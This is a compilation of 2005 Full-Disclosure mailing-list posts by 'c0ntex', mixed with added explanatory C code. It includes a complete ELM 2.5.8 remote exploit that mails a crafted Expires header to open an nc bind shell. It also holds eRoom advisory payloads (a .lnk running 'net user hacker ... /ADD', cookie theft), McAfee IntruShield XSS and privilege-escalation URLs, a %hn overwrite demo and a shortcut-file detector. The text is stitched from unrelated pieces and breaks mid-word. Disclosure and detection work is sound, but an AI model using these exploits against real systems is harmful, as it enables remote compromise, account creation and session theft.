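The MSB-only overwrite the advisory above relies on, as an added example that is not the advisory's exploit code: it shows the byte-counter arithmetic behind a %hn partial write and applies it to a constructed saved-EBP value. The target pointer is handed to snprintf as an explicit argument rather than located on the stack with a positional %N$hn, so it runs unchanged on any x86/x86-64 Linux; little-endian layout is assumed, the 0xbffff4c8 starting value is made up, and 0x0822 is used as the destination because 0x0822xxxx is the range the advisory gives for the .rp-mapped shellcode. `pad_for`, `overwrite_msb16`, `union word` and the `demo_*` functions are this example's own names.

```c
#include <stdint.h>
#include <stdio.h>

/* Byte-counter arithmetic for a %hn write: how much padding the format must emit so
 * that the 16-bit value stored is `want`, given `already` bytes printed before the %hn.
 * %*x prints at least one character, so a wanted value of 0 is reached by wrapping
 * the counter through 0x10000. */
size_t pad_for(uint16_t want, size_t already)
{
    size_t pad = ((size_t)want - already) & 0xffffu;
    return pad ? pad : 0x10000u;
}

/* A 32-bit word viewed as two shorts; on little-endian x86, h[1] is the high half. */
union word { uint32_t w; short h[2]; };

/* Partial overwrite: replace only the most significant 16 bits of target->w with
 * want_hi, leaving the low half untouched. The pointer goes to snprintf as an explicit
 * argument here; in the real bug it is fetched from the stack with a positional %N$hn,
 * but the store that %hn performs is the same. */
uint32_t overwrite_msb16(union word *target, uint16_t want_hi)
{
    static char sink[0x10000 + 16];                    /* absorbs up to 64 KiB of padding */
    size_t pad = pad_for(want_hi, 0);
    snprintf(sink, sizeof sink, "%*x%hn", (int)pad, 0u, &target->h[1]);
    return target->w;
}

/* Worked run mirroring the advisory: a constructed saved EBP of 0xbffff4c8 gets its upper
 * half redirected into 0x0822xxxx, the range the .rp-mapped shellcode lives in, while the
 * low 16 bits (f4c8) survive. Returns 0x0822f4c8. */
uint32_t demo_redirect_ebp(void)
{
    union word ebp = { .w = 0xbffff4c8u };
    return overwrite_msb16(&ebp, 0x0822);
}

/* Edge case: wanting 0x0000 in the high half forces the counter to wrap. Returns 0x00004141. */
uint32_t demo_zero_high(void)
{
    union word w = { .w = 0x41414141u };
    return overwrite_msb16(&w, 0);
}

int main(void)
{
    printf("saved EBP after MSB overwrite : 0x%08x\n", demo_redirect_ebp());
    printf("0x41414141 with high half zero: 0x%08x\n", demo_zero_high());
    return 0;
}
```

The same `pad_for` arithmetic is what an exploit uses to choose the width of its padding field when the %hn is preceded by other output: pass the number of bytes already printed as `already` and the result wraps correctly through 16 bits.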

Re: [Full-disclosure] CORE-Impact license bypass

2005-09-26 Thread c0ntex
CORE is a good product for what it does, just as NMAP is and just like
Nessus is, though relying on them is probably not a good idea for an
audit. I'd rather do all pentesting by hand, nothing can compete against
that, and I can't think of a time where I have ever used either Nessus
or CORE in an audit.

Never used CANVAS. I don't care for automated exploit tools but
someone had CORE and I fancied a play, as the CORE team are a pretty
interesting bunch of guys.

On 26/09/05, Josh Perrymon [EMAIL PROTECTED] wrote:
 While on the topic of Impact...

 What do you see as the real value of the program?
 Is it just because it has all the exploits in there and it's GUI based?

 What can you do with it you cant do by hand?

 Also- how does it compare to CANVAS?

 JP

 -Original Message-
 From: [EMAIL PROTECTED]
 [mailto:[EMAIL PROTECTED] On Behalf Of c0ntex
 Sent: Monday, September 26, 2005 3:27 PM
 To: full-disclosure@lists.grok.org.uk
 Subject: Re: [Full-disclosure] CORE-Impact license bypass

 On 26/09/05, c0ntex [EMAIL PROTECTED] wrote:
  Sure, but you would hope that once your yearly license key had
  expired, you would not be able to use the program again, at least to
  exploit remote boxen.
 
  It's not a big deal and I don't want people thinking I am saying this
  is some 0day or anything, it's dumb but I thought it might be
  interesting.. to CORE in particular, since I guess they might be
  inadvertently losing money that is rightfully theirs, CORE is a great
  product and deserves the $$$. hence the reason I have uninstalled it.
 
  Anyway, any more comments on this issue, send them to CORE.  :-)






--

regards
c0ntex


Re: [Full-disclosure] CORE-Impact license bypass

2005-09-26 Thread c0ntex
On 26/09/05, Josh Perrymon [EMAIL PROTECTED] wrote:
 I just think that too many consultants are relying on automated tools to
 do their job.  Don't get me wrong...  I use them on every project-

 Nmap
 Nessus
 AMAP
 MetaSploit
 HPING2
 VomiT
 Acunetix
 Etc.


concur.

Hmm, never used Acunetix, *googles*

btw, for what it matters, I meant I have never used CORE or CANVAS in an audit..


regards
c0ntex


[Full-disclosure] ELM 2.5.8 Remote Exploit POC

2005-08-22 Thread c0ntex
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <stdint.h>

#define BUFFER 128           /* holds "Expires: " + padding + 3 addresses + STRING */
#define EMAIL  "tmpmail"
#define STRING "`nc -l -p 12345 -e /bin/sh`##"
#define SYSLOC 0x42041e50    /* system() in the target libc (from the ret2libc layout below) */
#define STRLOC 0x4001a207    /* where the command string is expected to land */
#define EXTLOC 0x4202b0f0    /* exit(), returned into after system() */

/* "Expires: " as raw bytes: the header field elm mishandles */
char expire[] = "\x45\x78\x70\x69\x72\x65\x73\x3A\x20";

/* store a 32-bit address (host byte order) at buf[off] without relying on aligned casts */
static void put32(char *buf, int off, uint32_t val)
{
  memcpy(buf + off, &val, sizeof val);
}

int main(int argc, char **argv)
{
  char buffer[BUFFER];
  const char *email = NULL;
  char *user = NULL;
  int i;
  uint32_t extloc, sysloc, strloc;
  FILE *fp;

  if(argc != 2) {
    puts("Usage: ./elmex [EMAIL PROTECTED]");
    exit(EXIT_FAILURE);
  }

  if(strlen(argv[1]) > 50) {
    puts("[-] Sorry, email address too long!");
    exit(EXIT_FAILURE);
  }

  /* +1 for the terminator; the copy is printed with %s below */
  user = (char *)malloc(strlen(argv[1]) + 1);
  if(!user) {
    perror("malloc");
    exit(EXIT_FAILURE);
  }

  email = EMAIL;

  memset(user, '\0', strlen(argv[1]) + 1);
  memcpy(user, argv[1], strlen(argv[1]));

  puts("\nExploit for elm email client 2.5.8 overflow in Expires field");
  puts("Tested: Redhat on quite a Sunday by c0ntex[at]open-security.org\n");

  extloc = EXTLOC;
  sysloc = SYSLOC;
  strloc = STRLOC;

  memset(buffer, '\0', BUFFER);
  memcpy(buffer, expire, strlen(expire));

  /* pad up to the saved return address, then the ret2libc frame:
     system() <- return into exit() <- pointer to the command string */
  for(i = strlen(expire); i < 53; i++)
    buffer[i] = 0x41;
  put32(buffer, 53, sysloc);
  put32(buffer, 57, extloc);
  put32(buffer, 61, strloc);

  memcpy(&buffer[65], STRING, strlen(STRING));
  buffer[BUFFER - 1] = '\0';

  puts("[-] Adding exploit buffer to email");

  fp = fopen(email, "w");
  if(!fp) {
    perror("fopen"); free(user);
    exit(EXIT_FAILURE);
  }

  fprintf(fp,
          "From: User c0ntex [EMAIL PROTECTED] Sun Aug 21 13:37:00 2005\n"
          "Return-Path: [EMAIL PROTECTED]\n"
          "Date: Sun, 21 Aug 2005 13:37:00 %s\n"
          "Subject: Insecure?\n"
          "To: %s\n"
          "%s\n", STRING, user, buffer);
  fclose(fp);

  printf("[-] Emailing %s with malicious content\n", argv[1]);

  if(system("/bin/cat ./tmpmail | /usr/sbin/sendmail -t") < 0) {
    perror("system"); free(user);
    exit(EXIT_FAILURE);
  }

  puts("[-] Connect to system on port 12345 to get your shell\n");

  if(unlink(EMAIL) < 0)
    perror("unlink");

  free(user);

  return EXIT_SUCCESS;
}

-- 

regards
c0ntex


Fwd: [Full-disclosure] RE: eRoom Multiple Security Issues

2005-07-07 Thread c0ntex
The .lnk file can be anything and IS only executed once the user
clicks on it. i.e., I'm a vendor with access to the site, I upload my
cmd.exe.lnk file in my example, renamed to budget_info, and send an
email announcement via eRoom to all users to come look at the new
budget. When the users of the site then click on the file, it silently
adds a user account to their PC. The problem is due to the fact that
the eRoom plugin will silently download and run the file without popping up any
message.

The cookie code can be used for any cookie stealing, yes, that's not the
point and the code is just an example. The problem is that one can
replay eRoom's cookies and gain access once you have harvested them via
a JavaScript-embedded HTML file, or whatever. Getting your HTML on
the site is trivial if you have access to eRoom, as there is always
somewhere usually that you can post. Once you have that file
uploaded, you can reference anywhere you like via <a href>, <IFRAME>
and the likes.

regards
c0ntex

On 07/07/05, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote:
 I don't see how uploading a .LNK file to E-Room would cause the file to be
 executed.  Wouldn't a .LNK file be treated as an Internet Link and attempt to
 be rendered in Internet Explorer?  Any chance of you posting your exact .lnk
  file to the list?  I must be missing something in between the jigs and the
 reels...

With the code you supplied for the cookie grabbing, couldn't you use that
 same code for any cookie harvesting as long as you know the name of the cookie
 you want to grab?   Of course the trick would be to get a link to your HTML
 code up on the site you wish to harvest the cookies from.

   Exibar


 - Original Message -
 From: c0ntex [EMAIL PROTECTED]
 To: full-disclosure@lists.grok.org.uk
 Sent: Wednesday, July 06, 2005 3:12 PM
 Subject: [Full-disclosure] eRoom Multiple Security Issues

 /*
 ******************************************************************************
   $ An open security advisory #9 - eRoom v6.* Vulnerabilities
 ******************************************************************************
   1: Bug Researcher: c0ntex - c0ntexb[at]gmail.com
   2: Bug Released: July 06 2005
   3: Bug Impact Rate: Medium / Hi
   4: Bug Scope Rate: Remote
 ******************************************************************************
   $ This advisory and/or proof of concept code must not be used for commercial gain.
 ******************************************************************************

   Documentum eRoom
   http://www.documentum.com

   Documentum eRoom enables enterprises to become more productive, efficient, and agile by bringing
   together people, processes, and content. In fact, more than 1000 Global 2000 enterprises use
   Documentum eRoom to optimize key projects and processes.

   eRoom has some vulnerabilities in that it does not deal with attached files or handle cookies in
   a secure manner. This being the case, it is possible to abuse trust between users utilising the
   system, execute code on systems of valid users and compromise user accounts by stealing/replaying
   their session cookies.

   Issues
   ------

   1) Attaching malicious files
   2) Stealing and replaying cookies
      - I am unable to verify if the replay attack and cookie time out affects all versions of eRoom
        6.* as I do not have access to a default installation and am unable to find a demo version
        that I can use, though the chances are it is. I can guarantee that cookies can be stolen from
        all versions and JavaScript / HTML can be run from within an attached file.

   1 - Attached files
   ------------------

   eRoom allows a user to attach files into the website to share with other users, however there is
   no restriction on the type of file that can be attached. This can be abused to remotely compromise
   the systems of eRoom's users.

   If an .exe file is uploaded, when the user clicks on the file the usual "what do you want to do
   with this file" box pops up and as such, this does not seem a big problem. However, this check can
   be bypassed by uploading a .lnk file (windows shortcut) to the site, which contains any command you
   wish; I used the following:

   %SystemRoot%\system32\cmd.exe /k net user hacker hackerpass /ADD

   proving it is possible to have a command run on the remote user's system once the user clicks on the
   file. Notice there is no further user interaction required and no pop-up box is received; the .lnk
   just gets downloaded by the eRoom plugin in the background and gets run, adding a user account to
   the system.

   There are no warnings given to the user about the file containing a link to an executable image, and
   as such, it remains an invisible compromise.

   The downloaded file will be left
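A server-side check for the attachment problem in the eRoom thread above, as an added example that is neither eRoom's code nor the advisory's: a bounds-checked parser for the parts of a Windows shortcut that decide what it runs (the MS-SHLLINK ShellLinkHeader, its LinkFlags word at offset 0x14, and the StringData block that carries the relative path and command-line arguments), plus a policy that rejects shortcuts pointing at a command interpreter or carrying arguments at all. The .lnk bytes are constructed in memory by `build_sample_lnk`, mirroring the `cmd.exe /k net user` payload quoted in the advisory; the interpreter list and every function name are this example's own. Real shortcuts normally also carry an IDList and a LinkInfo block, which the parser skips by their size fields, and a LinkCLSID that a strict validator would also check (the sample leaves it zero).

```c
#include <stdint.h>
#include <string.h>
#include <strings.h>

/* LinkFlags bits from the MS-SHLLINK ShellLinkHeader (the flags word sits at offset 0x14) */
enum { HAS_IDLIST = 0x01, HAS_LINKINFO = 0x02, HAS_NAME = 0x04, HAS_RELPATH = 0x08,
       HAS_WORKDIR = 0x10, HAS_ARGS = 0x20, HAS_ICON = 0x40, IS_UNICODE = 0x80 };

struct lnk { char name[256], relpath[256], workdir[256], args[256], icon[256]; };

static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | p[1] << 8); }
static uint32_t rd32(const uint8_t *p) { return rd16(p) | (uint32_t)rd16(p + 2) << 16; }

/* One StringData entry: CountCharacters (2 bytes) then the characters, UTF-16LE when IsUnicode
 * is set. Non-ASCII folds to '?'. Returns 0 if the entry would run past n. */
static int rd_str(const uint8_t *b, size_t n, size_t *pos, int uni, char *out, size_t cap)
{
    if (*pos > n || n - *pos < 2) return 0;
    size_t cnt = rd16(b + *pos), w = uni ? 2 : 1, o = 0;
    *pos += 2;
    if (cnt * w > n - *pos) return 0;
    for (size_t i = 0; i < cnt; i++) {
        uint16_t c = uni ? rd16(b + *pos + 2 * i) : b[*pos + i];
        if (o + 1 < cap) out[o++] = c < 0x80 ? (char)c : '?';
    }
    out[o] = '\0';
    *pos += cnt * w;
    return 1;
}

/* Extract the fields that decide what a shortcut runs. Returns 1 on success, 0 for a malformed
 * or truncated file; every read is bounds-checked against n. */
int parse_lnk(const uint8_t *b, size_t n, struct lnk *out)
{
    memset(out, 0, sizeof *out);
    if (n < 0x4C || rd32(b) != 0x4C) return 0;          /* HeaderSize is always 0x4C */
    uint32_t flags = rd32(b + 0x14);
    int uni = (flags & IS_UNICODE) != 0;
    size_t pos = 0x4C;
    if (flags & HAS_IDLIST) {                            /* IDListSize, then the IDList */
        if (n - pos < 2) return 0;
        pos += 2 + rd16(b + pos);
    }
    if (flags & HAS_LINKINFO) {                          /* LinkInfoSize counts itself */
        if (pos > n || n - pos < 4 || rd32(b + pos) < 4) return 0;
        pos += rd32(b + pos);
    }
    if (pos > n) return 0;
    struct { uint32_t f; char *dst; } sd[5] = {          /* StringData, in spec order */
        { HAS_NAME, out->name }, { HAS_RELPATH, out->relpath }, { HAS_WORKDIR, out->workdir },
        { HAS_ARGS, out->args }, { HAS_ICON, out->icon } };
    for (int i = 0; i < 5; i++)
        if ((flags & sd[i].f) && !rd_str(b, n, &pos, uni, sd[i].dst, 256)) return 0;
    return 1;
}

/* Upload policy: a "document" shortcut must not resolve to a command interpreter and must carry
 * no arguments. The interpreter list is this example's own choice, not eRoom's. */
int lnk_is_suspicious(const struct lnk *l)
{
    static const char *const shells[] = { "cmd.exe", "powershell.exe", "wscript.exe",
                                          "cscript.exe", "mshta.exe", "rundll32.exe" };
    const char *base = strrchr(l->relpath, '\\');
    base = base ? base + 1 : l->relpath;
    for (size_t i = 0; i < sizeof shells / sizeof *shells; i++)
        if (strcasecmp(base, shells[i]) == 0) return 1;
    return l->args[0] != '\0';
}

/* Constructed sample: header + RELATIVE_PATH + COMMAND_LINE_ARGUMENTS as UTF-16LE, no IDList or
 * LinkInfo, CLSID left zero. Returns bytes written, 0 if cap is too small. */
size_t build_sample_lnk(uint8_t *b, size_t cap, const char *relpath, const char *args)
{
    const char *strs[2] = { relpath, args };
    size_t pos = 0x4C;
    if (cap < pos) return 0;
    memset(b, 0, pos);
    b[0] = 0x4C;                                         /* HeaderSize */
    b[0x14] = HAS_RELPATH | HAS_ARGS | IS_UNICODE;       /* LinkFlags = 0xA8 */
    for (int s = 0; s < 2; s++) {
        size_t len = strlen(strs[s]);
        if (cap - pos < 2 + 2 * len) return 0;
        b[pos++] = (uint8_t)len; b[pos++] = (uint8_t)(len >> 8);
        for (size_t i = 0; i < len; i++) { b[pos++] = (uint8_t)strs[s][i]; b[pos++] = 0; }
    }
    return pos;
}

/* The advisory's payload: parsed, flagged, and the arguments come back intact (returns 1). */
int demo_cmd_shortcut(void)
{
    uint8_t buf[512]; struct lnk l;
    size_t n = build_sample_lnk(buf, sizeof buf, "..\\..\\Windows\\System32\\cmd.exe", "/k net user hacker hackerpass /ADD");
    return n && parse_lnk(buf, n, &l) && lnk_is_suspicious(&l) && strcmp(l.args, "/k net user hacker hackerpass /ADD") == 0;
}

/* A plain document shortcut with no arguments is left alone (returns 1). */
int demo_benign_shortcut(void)
{
    uint8_t buf[512]; struct lnk l;
    size_t n = build_sample_lnk(buf, sizeof buf, "..\\Documents\\budget_info.xls", "");
    return n && parse_lnk(buf, n, &l) && !lnk_is_suspicious(&l);
}

/* Edge case: a file cut off inside its argument string is rejected, not over-read (returns 1). */
int demo_truncated_rejected(void)
{
    uint8_t buf[512]; struct lnk l;
    size_t n = build_sample_lnk(buf, sizeof buf, "..\\Windows\\System32\\cmd.exe", "/k whoami");
    return n && !parse_lnk(buf, n - 5, &l);
}
```

Run `parse_lnk` over the raw bytes of each uploaded att
achment whose first four bytes are `4C 00 00 00` regardless of its extension; the advisory's point is that the file was renamed to `budget_info`, so the name tells you nothing.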

[Full-disclosure] McAfee Intrushield IPS Abuse

2005-07-06 Thread c0ntex
/*
 ******************************************************************************
 $ An open security advisory #8 - McAfee Intrushield IPS Management Console Abuse
 ******************************************************************************
 1: Bug Researcher: c0ntex - c0ntexb[at]gmail.com
 2: Bug Released: July 06 2005
 3: Bug Impact Rate: Medium / Hi
 4: Bug Scope Rate: Local / Remote
 ******************************************************************************
 $ This advisory and/or proof of concept code must not be used for commercial gain.
 ******************************************************************************

 McAfee IntruShield Security Management System
 http://www.mcafeesecurity.com/us/products/mcafee/network_ips/category.htm


 The McAfee IntruShield Security Management System is an advanced solution for administering IntruShield
 sensor appliance deployments. The IntruShield Security Management System (ISM) can support both large and
 small network intrusion prevention system (IPS) deployments and can scale up to several hundred sensor
 appliances. By integrating a comprehensive set of Best-in-Class security management functions, the
 IntruShield Security Management System dramatically simplifies and streamlines the complexities associated
 with IPS configuration, policy compliance, and threat and response management.

 I have found some security vulnerabilities in this product whereby a user can elevate their privileges from
 a user that can only view alerts logged by remote sensors, to a scenario where the user can gain access to
 acknowledge, accept and delete alerts and access the Management Console. It is also possible to inject
 malicious HTML and JavaScript into the URLs and have this malicious script run on the client's machine,
 allowing for account information hijacking.

 A new version has been released to address these bugs and can be downloaded from their site.

*/

 Issues:
 1) Inject HTML
 2) Inject JavaScript
 3) Access privileged reports
 4) Acknowledge and delete alerts
 5) Gain access to Management Console

 Note: for issues 1 - 4, the attacker needs a valid user account.

 1) It is possible to embed HTML into the MISMS. This could potentially allow phishing attacks to be performed
 against a valid Manager account.

 https://intrushield/intruvert/jsp/systemHealth/SystemEvent.jsp?fullAccess=false&faultResourceName=Manager
 &domainName=%2FDemo%3A0&resourceName=%2FDemo%3A0%2FManager&resourceType=Manager
 &topMenuName=SystemHealthManager&secondMenuName=Faults&resourceId=-1&thirdMenuName=<iframe%20src=
 http://www.mcafeesecurity.com/us/about/press/corporate/2005/20050411_185504.htm%20width=800%20height=600>
 </iframe>&severity=critical&count=1


 2) It is possible to embed JavaScript into the MISMS and have the embedded script execute in the security
 context of the user browsing the Management System.

 https://intrushield/intruvert/jsp/systemHealth/SystemEvent.jsp?fullAccess=false&faultResourceName=Manager
 &domainName=Demo&resourceName=<script>alert('There could be trouble ahead')</script><script>alert(document.cookie)</script>
 &resourceType=Manager&topMenuName=SystemHealthManager&secondMenuName=Faults&resourceId=-1&thirdMenuName=
 Critical&severity=critical&count=1


 3) It is possible to access the restricted "Generate Reports" section of the MISMS and as such, a non-privileged
 user can gain important information regarding the configuration and set-up of the IP devices being managed by the
 Service. This can be achieved by simply changing the Access option from false to true.

 https://intrushield:443/intruvert/jsp/reports/reports-column-center.jsp?monitoredDomain=%2FDemo
 &selectedDomain=0&fullAccessRight=true


 4) It is possible to acknowledge, de-acknowledge and delete alerts from the MISMS console by modifying URLs
 sent to the system, again by simply changing the Access option from false to true.

 https://intrushield/intruvert/jsp/systemHealth/SystemEvent.jsp?fullAccess=true&faultResourceName=Manager
 &domainName=%2FDemo%3A0&resourceName=%Demo%3A0%2FManager&resourceType=Manager
 &topMenuName=SystemHealthManager&secondMenuName=Faults&resourceId=-1&thirdMenuName=Critical&severity=
 critical&count=1

 Each change is emailed out to the administrator, however the email only says that someone made a change.

 5) By default, all user ID values are passed in the URL in the clear, meaning that it is trivial for an attacker
 to brute force accounts until a privileged Manager account is found. An example of this would look similar to:

 https://intrushield:443/intruvert/jsp/menu/disp.jsp?userId=1&logo=intruvert.gif
 https://intrushield:443/intruvert/jsp/menu/disp.jsp?userId=2&logo=intruvert.gif
 https://intrushield:443/intruvert/jsp/menu/disp.jsp?userId=3&logo=intruvert.gif
 https://intrushield:443/intruvert/jsp/menu/disp.jsp?userId=4&logo=intruvert.gif

 Th